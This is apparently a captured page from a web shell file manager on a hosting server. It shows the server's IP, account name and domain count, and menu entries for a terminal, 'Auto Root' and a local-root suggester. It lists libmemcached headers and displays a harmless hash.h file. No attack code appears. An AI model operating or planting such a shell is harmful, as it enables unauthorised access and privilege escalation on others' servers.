Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
apps /
php82 /
include /
libmemcached-1.0 /
Delete
Unzip
Name
Size
Permission
Date
Action
struct
[ DIR ]
drwxr-xr-x
2024-12-20 10:24
types
[ DIR ]
drwxr-xr-x
2024-12-20 10:24
alloc.h
2.16
KB
-rw-r--r--
2024-12-20 10:24
allocators.h
2.67
KB
-rw-r--r--
2024-12-20 10:24
analyze.h
2.09
KB
-rw-r--r--
2024-12-20 10:24
auto.h
5.53
KB
-rw-r--r--
2024-12-20 10:24
basic_string.h
2.02
KB
-rw-r--r--
2024-12-20 10:24
behavior.h
3.17
KB
-rw-r--r--
2024-12-20 10:24
callback.h
2.15
KB
-rw-r--r--
2024-12-20 10:24
callbacks.h
2.29
KB
-rw-r--r--
2024-12-20 10:24
configure.h
1.9
KB
-rw-r--r--
2024-12-20 10:24
defaults.h
2.39
KB
-rw-r--r--
2024-12-20 10:24
delete.h
2.22
KB
-rw-r--r--
2024-12-20 10:24
deprecated_types.h
2.57
KB
-rw-r--r--
2024-12-20 10:24
dump.h
1.9
KB
-rw-r--r--
2024-12-20 10:24
encoding_key.h
1.84
KB
-rw-r--r--
2024-12-20 10:24
error.h
2.3
KB
-rw-r--r--
2024-12-20 10:24
exception.hpp
1.14
KB
-rw-r--r--
2024-12-20 10:24
exist.h
2.05
KB
-rw-r--r--
2024-12-20 10:24
fetch.h
2.04
KB
-rw-r--r--
2024-12-20 10:24
flush.h
1.84
KB
-rw-r--r--
2024-12-20 10:24
flush_buffers.h
1.83
KB
-rw-r--r--
2024-12-20 10:24
get.h
4.63
KB
-rw-r--r--
2024-12-20 10:24
hash.h
2.34
KB
-rw-r--r--
2024-12-20 10:24
limits.h
1.96
KB
-rw-r--r--
2024-12-20 10:24
memcached.h
5.43
KB
-rw-r--r--
2024-12-20 10:24
memcached.hpp
28.39
KB
-rw-r--r--
2024-12-20 10:24
options.h
1.88
KB
-rw-r--r--
2024-12-20 10:24
parse.h
424
B
-rw-r--r--
2024-12-20 10:24
platform.h
2.04
KB
-rw-r--r--
2024-12-20 10:24
quit.h
1.81
KB
-rw-r--r--
2024-12-20 10:24
result.h
3
KB
-rw-r--r--
2024-12-20 10:24
return.h
3.03
KB
-rw-r--r--
2024-12-20 10:24
sasl.h
2.47
KB
-rw-r--r--
2024-12-20 10:24
server.h
4.87
KB
-rw-r--r--
2024-12-20 10:24
server_list.h
2.88
KB
-rw-r--r--
2024-12-20 10:24
stats.h
2.66
KB
-rw-r--r--
2024-12-20 10:24
storage.h
6.33
KB
-rw-r--r--
2024-12-20 10:24
strerror.h
1.86
KB
-rw-r--r--
2024-12-20 10:24
touch.h
2.25
KB
-rw-r--r--
2024-12-20 10:24
triggers.h
2.63
KB
-rw-r--r--
2024-12-20 10:24
types.h
3.06
KB
-rw-r--r--
2024-12-20 10:24
verbosity.h
1.85
KB
-rw-r--r--
2024-12-20 10:24
version.h
1.89
KB
-rw-r--r--
2024-12-20 10:24
visibility.h
2
KB
-rw-r--r--
2024-12-20 10:24
Save
Rename
/* vim:expandtab:shiftwidth=2:tabstop=2:smarttab: * * Libmemcached library * * Copyright (C) 2011 Data Differential, http://datadifferential.com/ * Copyright (C) 2006-2009 Brian Aker All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * * Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * * The names of its contributors may not be used to endorse or * promote products derived from this software without specific prior * written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * */ #pragma once #ifdef __cplusplus extern "C" { #endif /* The two public hash bits */ LIBMEMCACHED_API uint32_t memcached_generate_hash_value(const char *key, size_t key_length, memcached_hash_t hash_algorithm); LIBMEMCACHED_API const hashkit_st *memcached_get_hashkit(const memcached_st *ptr); LIBMEMCACHED_API memcached_return_t memcached_set_hashkit(memcached_st *ptr, hashkit_st *hashk); LIBMEMCACHED_API uint32_t memcached_generate_hash(const memcached_st *ptr, const char *key, size_t key_length); LIBMEMCACHED_API void memcached_autoeject(memcached_st *ptr); LIBMEMCACHED_API const char * libmemcached_string_hash(memcached_hash_t type); #ifdef __cplusplus } #endif